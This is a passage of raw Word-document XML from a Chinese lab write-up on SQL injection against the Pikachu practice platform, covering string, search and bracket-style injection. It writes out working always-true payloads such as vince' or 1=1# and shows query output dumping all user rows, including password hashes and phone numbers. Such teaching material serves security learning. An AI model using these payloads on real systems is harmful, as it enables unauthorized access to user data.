        <w:t>我们发现这个语句存在问题，发现这个语句的vince or 1=1是直接被认作字符串，我们在vince后面添加单引号来闭合vince，再在1=1后面添加注释#来消除掉后面的单引号，这样来完成一个SQL语句的拼接合法性。完整的语句为select id,email from member where username='vince</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">‘ </w:t>
      </w:r>
      <w:r w:rsidRPr="001D6220">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>or 1=1#'；我们回到pikachu平台输入vince‘ or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE13F77"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b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54BC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql&gt; select id,email from member where username='vince' or 1=1#';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354C8F86"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b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54BC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">    -&gt; ;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552AD29B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DE76B9"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id | email             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7D7F0E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8032DA"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1 | vince@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B84ED"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2 | allen@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7997469F"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3 | kobe@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D2963"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4 | grady@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA99CE5"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5 | kevin@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F4E68A"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6 | lucy@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023D24D0"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  7 | lili@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB9E985" w14:textId="77777777" w:rsidR="00D54BC2" w:rsidRP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lastRenderedPageBreak/>
        <w:t>+----+-------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D4088BB" w14:textId="77777777" w:rsidR="00D54BC2" w:rsidRDefault="00D54BC2" w:rsidP="00D54BC2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D54BC2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>7 rows in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCA509D" w14:textId="77777777" w:rsidR="0073082D" w:rsidRPr="00D54BC2" w:rsidRDefault="0073082D" w:rsidP="00D54BC2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="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17FFA1C9" wp14:editId="44EE4FCC">
            <wp:extent cx="5189855" cy="5469890"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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9855" cy="5469890"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F837957" w14:textId="77777777" w:rsidR="00236C39" w:rsidRPr="009E7F7C" w:rsidRDefault="00236C39" w:rsidP="00236C3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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidR="0054502D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0054502D" w:rsidRPr="0054502D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>搜索型</w:t>
      </w:r>
      <w:r w:rsidR="0054502D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D2E46F" w14:textId="77777777" w:rsidR="00236C39" w:rsidRDefault="00234A5F" w:rsidP="00236C39">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打开pikachu平台，在SQL-Inject下选择搜索型注入，然后随意输入一个字母，能看到匹配出了对应的信息。按照SQL的模糊查询命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">select * from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>字段名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> like ‘%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>（对应值）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>%’;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，发现可以按照之前的思路来实现万能语句的拼接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02924A66"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mysql&gt; select * from member where username like '%vince%' or 1=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413CD6E3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560CA645"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lastRenderedPageBreak/>
        <w:t>----------------+-------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5393D0"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id | username | pw                               | sex  | phonenum    | addres</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A57DF"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s               | email             |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE9E086"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A575EB4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D8FA0D"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1 | vince    | e10adc3949ba59abbe56e057f20f883e | boy  | 18626545453 | chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FDBCAE"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xml:space="preserve">                | vince@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C5800"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2 | allen    | e10adc3949ba59abbe56e057f20f883e | boy  | 13676767767 | nba 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2508A3FC"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xml:space="preserve">                | allen@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5787C5EC"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3 | kobe     | e10adc3949ba59abbe56e057f20f883e | boy  | 15988767673 | nba la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC0E49A"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kes             | kobe@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E90B6"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4 | grady    | e10adc3949ba59abbe56e057f20f883e | boy  | 13676765545 | nba hs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED24266"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xml:space="preserve">                | grady@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A2A4E"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5 | kevin    | e10adc3949ba59abbe56e057f20f883e | boy  | 13677676754 | Oklaho</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F45D7B8"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ma City Thunder | kevin@pikachu.com |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0571581B"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6 | lucy     | e10adc3949ba59abbe56e057f20f883e | girl | 12345678922 | usa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684DC85E"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xml:space="preserve">                | lucy@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C9FB5"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7 | lili     | e10adc3949ba59abbe56e057f20f883e | girl | 18656565545 | usa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E57A942" w14:textId="77777777" w:rsidR="00A2480F" w:rsidRPr="00A2480F" w:rsidRDefault="00A2480F" w:rsidP="00A2480F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="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 xml:space="preserve">                | lili@pikachu.com  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04054643" w14:textId="77777777" w:rsidR="00234A5F" w:rsidRDefault="00A2480F" w:rsidP="00A2480F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A2480F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>+----+----------+----------------------------------+------+-------------+--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5965206D" w14:textId="77777777" w:rsidR="00A2480F" w:rsidRDefault="00210B30" w:rsidP="00A2480F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>回到pikachu平台,将拼接语句写为</w:t>
      </w:r>
      <w:r w:rsidR="009D693F" w:rsidRPr="009D693F">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>%xxxx%'or 1=1 #%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1799D642" w14:textId="77777777" w:rsidR="00A2480F" w:rsidRDefault="009D693F" w:rsidP="00A2480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14:anchorId="05780C4C" wp14:editId="697C6226">
            <wp:extent cx="5278120" cy="3349904"/>
            <wp:effectExtent l="19050" t="0" r="0" b="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8120" cy="3349904"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BD6198" w14:textId="77777777" w:rsidR="000C7863" w:rsidRPr="009E7F7C" w:rsidRDefault="000C7863" w:rsidP="000C7863">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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F27153">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>XX</w:t>
      </w:r>
      <w:r w:rsidRPr="0054502D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>型</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1355BFDD" w14:textId="77777777" w:rsidR="009D693F" w:rsidRDefault="004067BA" w:rsidP="00A2480F">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XX型是由于SQL语句拼接方式不同</w:t>
      </w:r>
      <w:r w:rsidR="00973CC1">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，注入语句如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAE4B3D" w14:textId="77777777" w:rsidR="00973CC1" w:rsidRPr="00973CC1" w:rsidRDefault="00973CC1" w:rsidP="00A2480F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00973CC1">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>mysql&gt; select * from member where username=('xx') or 1=1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488947B7" w14:textId="77777777" w:rsidR="004067BA" w:rsidRDefault="004067BA" w:rsidP="00A2480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63CE41E4" wp14:editId="7AC2ABDB">
            <wp:extent cx="5278120" cy="3444444"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>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8120" cy="3444444"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591082D" w14:textId="77777777" w:rsidR="004067BA" w:rsidRDefault="006B17CC" w:rsidP="00A2480F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="4F4F4F"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>回到pikachu平台,将拼接语句写为</w:t>
      </w:r>
      <w:r w:rsidRPr="006B17CC">
        <w:rPr>
          <w:rStyle w:val="HTML0"/>
          <w:rFonts w:ascii="DejaVu Sans Mono" w:hAnsi="DejaVu Sans Mono" w:cs="DejaVu Sans Mono"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>XX') or 1=1#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F3983D" w14:textId="77777777" w:rsidR="006B17CC" w:rsidRDefault="006B17CC" w:rsidP="00A2480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1947DD35" wp14:editId="74FDFC6A">
            <wp:extent cx="5278120" cy="3738720"/>
            <wp:effectExtent l="19050" t="0" r="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8120" cy="3738720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="17243999" w14:textId="77777777" w:rsidR="00856B8B" w:rsidRDefault="00856B8B" w:rsidP="00856B8B">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD695F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>提交方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C26976" w14:textId="77777777" w:rsidR="00E04B51" w:rsidRPr="00E04B51" w:rsidRDefault="00E04B51" w:rsidP="00E04B51">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ASP：request （全部接受）、request.querystring （接受get）、request.form （接受post）、 request.cookie cookie （接受cookie）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3454CDA0" w14:textId="77777777" w:rsidR="00E04B51" w:rsidRPr="00E04B51" w:rsidRDefault="00E04B51" w:rsidP="00E04B51">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:snapToGrid w:val="0"/>
        <w:ind w:firstLineChars="0" w:firstLine="420"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PHP:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> $_REQUEST</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（全部接受）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">$_GET $_POST </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（接受post）、</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>$_COOKIE</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04B51">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>（接受cookie）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34615355" w14:textId="77777777" w:rsidR="00E04B51" w:rsidRPr="00E04B51" w:rsidRDefault="00E04B51" w:rsidP="00E04B51">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14C6C66A" w14:textId="77777777" w:rsidR="00E04B51" w:rsidRPr="00E04B51" w:rsidRDefault="00E04B51" w:rsidP="00E04B51">
      <w:pPr>
        <w:ind w:firstLine="420"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EC95742" wp14:editId="1D25566C">
            <wp:extent cx="3270250" cy="716915"/>
            <wp:effectExtent l="19050" t="0" r="6350"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270250" cy="716915"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B67E84" w14:textId="77777777" w:rsidR="00856B8B" w:rsidRPr="009E7F7C" w:rsidRDefault="00856B8B" w:rsidP="00856B8B">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4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
